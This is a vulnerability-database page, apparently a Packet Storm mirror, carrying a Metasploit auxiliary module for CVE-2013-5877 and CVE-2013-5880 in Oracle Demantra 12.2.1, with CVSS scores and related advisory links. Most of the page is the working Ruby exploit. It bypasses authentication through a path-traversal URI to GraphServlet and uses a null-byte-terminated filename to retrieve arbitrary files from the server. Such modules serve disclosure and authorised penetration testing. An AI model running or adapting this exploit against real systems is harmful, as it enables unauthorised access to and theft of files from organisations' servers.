Lucene search
Oliver Gruskovnjak, metasploit.comPACKETSTORM:181016HistorySep 01, 2024 - 12:00 a.m.
Oracle Demantra Arbitrary File Retrieval With Authentication Bypass
2024-09-0100:00:00
Oliver Gruskovnjak, metasploit.com
packetstormsecurity.com
11
oracle demantra
file retrieval
authentication bypass
vulnerability
exploit
security advisory
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
AI Score
6.6
Confidence
Low
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass',
'Description' => %q{
This module exploits a file download vulnerability found in Oracle
Demantra 12.2.1 in combination with an authentication bypass. By
combining these exposures, an unauthenticated user can retrieve any file
on the system by referencing the full file path to any file a vulnerable
machine.
},
'References' =>
[
[ 'CVE', '2013-5877'],
[ 'CVE', '2013-5880'],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/'],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/']
],
'Author' =>
[
'Oliver Gruskovnjak'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2014-02-28'
))
register_options(
[
Opt::RPORT(8080),
OptBool.new('SSL', [false, 'Use SSL', false]),
OptString.new('FILEPATH', [true, 'The name of the file to download', 'c:/windows/win.ini'])
])
end
def run_host(ip)
filename = datastore['FILEPATH']
authbypass = "/demantra/common/loginCheck.jsp/../../GraphServlet"
res = send_request_cgi({
'uri' => normalize_uri(authbypass),
'method' => 'POST',
'encode_params' => false,
'vars_post' => {
'filename' => "#{filename}%00"
}
})
if res.nil? or res.body.empty?
fail_with(Failure::UnexpectedReply, "No content retrieved from: #{ip}")
end
if res.code == 404
print_error("#{rhost}:#{rport} - File not found")
return
end
if res.code == 200
print_status("#{ip}:#{rport} returns: #{res.code.to_s}")
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'oracle.demantra',
'application/octet-stream',
ip,
res.body,
fname)
print_good("#{ip}:#{rport} - File saved in: #{path}")
end
end
end
`
Related
metasploit
metasploit
Oracle Demantra Arbitrary File Retrieval with Authentication Bypass
2014-03-27 04:53:12
Oracle Demantra Database Credentials Leak
2014-04-07 18:42:47
cvelist
cvelist
CVE-2013-5877
2014-01-15 00:30:00
CVE-2013-5880
2014-01-15 00:30:00
prion
prion
Buffer overflow
2014-01-15 16:11:00
Buffer overflow
2014-01-15 16:11:00
Design/Logic Flaw
2014-03-27 18:55:00
packetstorm
packetstorm
Oracle Demantra 12.2.1 Authentication Bypass
2014-03-02 00:00:00
Oracle Demantra 12.2.1 Arbitrary File Retrieval
2014-03-01 00:00:00
Oracle Demantra Database Credentials Leak
2024-09-01 00:00:00
nvd
nvd
cve
cve
exploitdb
exploitdb
Oracle Supply Chain Products Suite - Remote Security
2014-01-14 00:00:00
Oracle Demantra 12.2.1 - Arbitrary File Disclosure
2014-03-01 00:00:00
zdt
zdt
Oracle Demantra 12.2.1 - Arbitrary File Disclosure
2014-03-01 00:00:00
checkpoint_advisories
checkpoint_advisories
Oracle Demantra 1221 Arbitrary File Disclosure - Ver2 (CVE-2013-5877)
2015-03-26 00:00:00
threatpost
threatpost
Four Oracle Demantra Security Vulnerabilities Found
2014-03-03 14:08:14
securityvulns
securityvulns
oracle
oracle
Oracle Critical Patch Update - January 2014
2014-01-14 00:00:00
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
AI Score
6.6
Confidence
Low
Related for PACKETSTORM:181016